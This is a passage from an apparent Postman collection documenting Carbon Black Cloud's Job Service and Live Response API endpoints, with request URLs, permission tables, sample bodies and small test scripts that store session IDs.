href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#list-all-available-jobs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"query":[],"variable":[]}},"response":[],"_postman_id":"4c2656d4-1af9-459e-bf8d-708484a228ee"},{"name":"Get Job Details","id":"d39c171d-76ee-47ad-acf3-b908e5fa56a9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}","description":"<p>Get the details of a specific job.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d39c171d-76ee-47ad-acf3-b908e5fa56a9"},{"name":"Download Job Output","id":"7087eeb1-f4b1-4f24-b39c-f369f3b8c66f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download","description":"<p>Provides a redirect with a pre-signed S3 URL to download the output of the job.</p>\n<p>If the job does not exist or the output is not yet available, this route will return 404.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#download-job-output\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}","download"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"7087eeb1-f4b1-4f24-b39c-f369f3b8c66f"},{"name":"Get Job Progress","id":"8d2141ed-bedd-42de-8f43-ddf6fb57743d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/progress","description":"<p>This route <em>only</em> returns the progress of a specific job. This route is preferred over listing the entire job for checking the progress.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-progress\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}","progress"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8d2141ed-bedd-42de-8f43-ddf6fb57743d"},{"name":"Start an Export Events Job","id":"bc588356-a46e-4f79-97b5-41954d47f29a","protocolProfileBehavior":{"disableBodyPruning":true,"disabledSystemHeaders":{}},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"<choose one: ENRICHED_EVENTS, PROCESSES, PROCESS_EVENTS, AUTH_EVENTS, OBSERVATIONS>\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export","description":"<p>Used with investigate searches - Processes, Process Events, Observations, Auth Events and Enriched Events - to start a search job.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","start","event_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4d89bdad-6eaa-47d2-b755-b9ebd73810f5","name":"Start an Export Events Job","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"observations\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 5731438,\n    \"type\": \"event_export\",\n    \"job_parameters\": {\n        \"job_parameters\": {\n            \"query\": {\n                \"criteria\": {},\n                \"exclusions\": {},\n                \"query\": \"*:*\",\n                \"time_range\": {\n                    \"start\": \"2023-03-26T02:00:00.000Z\",\n                    \"end\": \"2023-03-29T02:06:20.864Z\"\n                },\n                \"rows\": 10000,\n                \"fields\": [\n                    \"*\"\n                ],\n                \"sort\": [\n                    {\n                        \"field\": \"device_timestamp\",\n                        \"order\": \"DESC\"\n                    }\n                ]\n            }\n        },\n        \"process_guid\": null,\n        \"api_resource\": \"OBSERVATIONS\",\n        \"version\": \"v2\",\n        \"search_id\": null\n    },\n    \"connector_id\": \"12345ABCD\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"CREATED\",\n    \"create_time\": \"2023-03-29T03:17:02.978Z\",\n    \"last_update_time\": \"2023-03-29T03:17:02.979Z\"\n}"}],"_postman_id":"bc588356-a46e-4f79-97b5-41954d47f29a"}],"id":"9803d5de-49c9-48cc-ad1a-ec5d88af67da","description":"<h1 id=\"job-service-api\">Job Service API</h1>\n<h2 id=\"introduction\">Introduction</h2>\n<p>The Job Service API tracks the execution of long running tasks making it easier to monitor progress of asynchronous jobs and retrieve the jobs’ output once completed and prevents important tasks from timing out mid execution. It can be used with other APIs, such as the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-query-run-results\">Live Query REST API - Get Query Run Results</a>, to asynchronously export large amounts of data.</p>\n<p>More about this API:</p>\n<ul>\n<li>Long running or slow jobs tracked through the jobs service will complete without timing out</li>\n<li>Downloads can be repeated without having to run the underlying job multiple times</li>\n<li>Jobs can only be seen by the connector or user who created them</li>\n<li>Jobs are saved for 30 days</li>\n</ul>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Any of the Carbon Black Cloud products</li>\n<li>Custom Access Level for category Background Tasks &gt; Status &gt; “jobs.status” with READ permission</li>\n<li>Must have a Job Investigate Page Export or <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/\">Live Query</a> to get the status of other asynchronous jobs</li>\n</ul>\n<h2 id=\"quick-setup\">Quick Setup</h2>\n<p>Typical use of the API follows this sequence:</p>\n<ol>\n<li>Call a route in a service that utilizes the job service (eg. <code>/jobs/v1/orgs/{org_key}/jobs/start/event_export</code> or <code>/livequery/v1/orgs/{org_key}/runs/{id}/results/_search?format=csv&amp;async=true</code>)</li>\n<li>Receive the job ID</li>\n<li>Call <code>/jobs/v1/orgs/{org_key}/jobs/{job_id}/progress</code> route to get job progress</li>\n<li>Repeat 3 until the status shows COMPLETED (or FAILED)</li>\n<li>If successful, call the <code>/jobs/v1/orgs/{org_key}/jobs/{job_id}/download</code> route to retrieve the output of the job</li>\n</ol>\n","_postman_id":"9803d5de-49c9-48cc-ad1a-ec5d88af67da","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Live Response APIs","item":[{"name":"Start Session","event":[{"listen":"test","script":{"exec":["pm.test(\"Updated cb_lr_session_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(201);","    pm.environment.set(\"cb_lr_session_id\", data.id);","});"],"type":"text/javascript","id":"9aeeb5f8-e645-469b-b7cd-8aef149860c5"}}],"id":"c56ad08e-aaa3-4261-87e2-706a7a371e1e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"device_id\": {{cb_device_id}}\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions","description":"<p>Creates a new Live Response session for the specific device. The returned session id is required by all other requests in this API. Sessions are kept alive for a timeout period and then terminated once the timeout period has expired. By default this period is 15 minutes.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#start-session\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c56ad08e-aaa3-4261-87e2-706a7a371e1e"},{"name":"Get Session by ID","id":"6f204e6e-741b-48aa-82e8-11ca0d8dee42","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}","description":"<p>Retrieve Live Response session by id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-session-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6f204e6e-741b-48aa-82e8-11ca0d8dee42"},{"name":"Get All Sessions","id":"86438d35-4d4f-4e82-ba85-f8afb7b8e81a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}","description":"<p>Get all Live Response sessions.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-all-sessions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"86438d35-4d4f-4e82-ba85-f8afb7b8e81a"},{"name":"Close Session","id":"19e57d45-ca4d-4ef3-87d6-ea5dbbc8e18d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}","description":"<p>Close Live Response session.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-all-sessions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"19e57d45-ca4d-4ef3-87d6-ea5dbbc8e18d"},{"name":"Disable Live Response","id":"18073c73-11c9-4ccb-aa64-45501ec725d7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[integer]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/kill","description":"<p>Close Live Response session.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-all-sessions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","kill"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"18073c73-11c9-4ccb-aa64-45501ec725d7"},{"name":"Get All Files Metadata","id":"55b71b18-78f7-47c9-8a37-9a8c7d548623","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/files","description":"<p>Gets all Carbon Black Cloud files metadata associated with the Live Response session. Returns File objects associated with the session, but not the content of those files. Retrieve file content with the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-file-content\">Get File Content</a> call.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.file</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-all-files-metadata\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","files"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"55b71b18-78f7-47c9-8a37-9a8c7d548623"},{"name":"Get File Metadata","id":"fc41751c-5088-4672-a42e-c6f2fa97688c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/files/{{cb_lr_file_id}}","description":"<p>Retrieve a particular File object by id for a session.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.file</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-file-metadata\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","files","{{cb_lr_file_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"fc41751c-5088-4672-a42e-c6f2fa97688c"},{"name":"Get File Content","id":"5b8eab9e-8667-4392-825f-196f835549b5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/files/{{cb_lr_file_id}}/content","description":"<p>Return the raw contents of the specified file.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.file</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#get-file-content\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","files","{{cb_lr_file_id}}","content"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5b8eab9e-8667-4392-825f-196f835549b5"},{"name":"Upload File to Carbon Black Cloud","id":"1b14c363-23d5-49e8-a071-0a62c42d26e5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"formdata","formdata":[{"key":"file","contentType":"multipart/form-data","type":"file","src":"/Users/rfortress/Desktop/test.bat"}]},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/files","description":"<p>Upload local file to Carbon Black Cloud through the Live Response session. A timeout may occur when uploading very large files. More information on the timeout period for a session is included in the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#start-session\">Start Session</a> call.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.file</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#upload-file-to-carbon-black-cloud\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","files"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1b14c363-23d5-49e8-a071-0a62c42d26e5"},{"name":"Delete File","id":"0bd603a7-c9b7-4e09-94ce-9e3d65b9163e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/files","description":"<p>Delete a file and its contents from Carbon Black Cloud for a Live Response session.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.file</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#delete-file\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","files"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0bd603a7-c9b7-4e09-94ce-9e3d65b9163e"},{"name":"Get Commands List","id":"14257dd2-9a32-4b9f-81de-01407ad77d6e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands","description":"<p>Delete a file and its contents from Carbon Black Cloud for a Live Response session.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.file</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#delete-file\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","commands"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"14257dd2-9a32-4b9f-81de-01407ad77d6e"},{"name":"Issue Command","event":[{"listen":"test","script":{"exec":["pm.test(\"Updated cb_lr_command_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(201);","    pm.environment.set(\"cb_lr_command_id\", data.id);","});"],"type":"text/javascript","id":"880e8b24-1710-4908-82b9-4616d76f9665"}}],"id":"87e36a2e-d475-4907-95ac-e0c04813a048","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"directory list\",\n  \"path\": \"C:\\\\\\\\Users\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands","description":"<p>Send a Live Response command to the sensor.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.liveresponse.process</td>\n<td>READ, EXECUTE, DELETE</td>\n</tr>\n<tr>\n<td>org.liveresponse.registry</td>\n<td>CREATE, READ, UPDATE, DELETE</td>\n</tr>\n<tr>\n<td>org.liveresponse.file</td>\n<td>CREATE, READ, 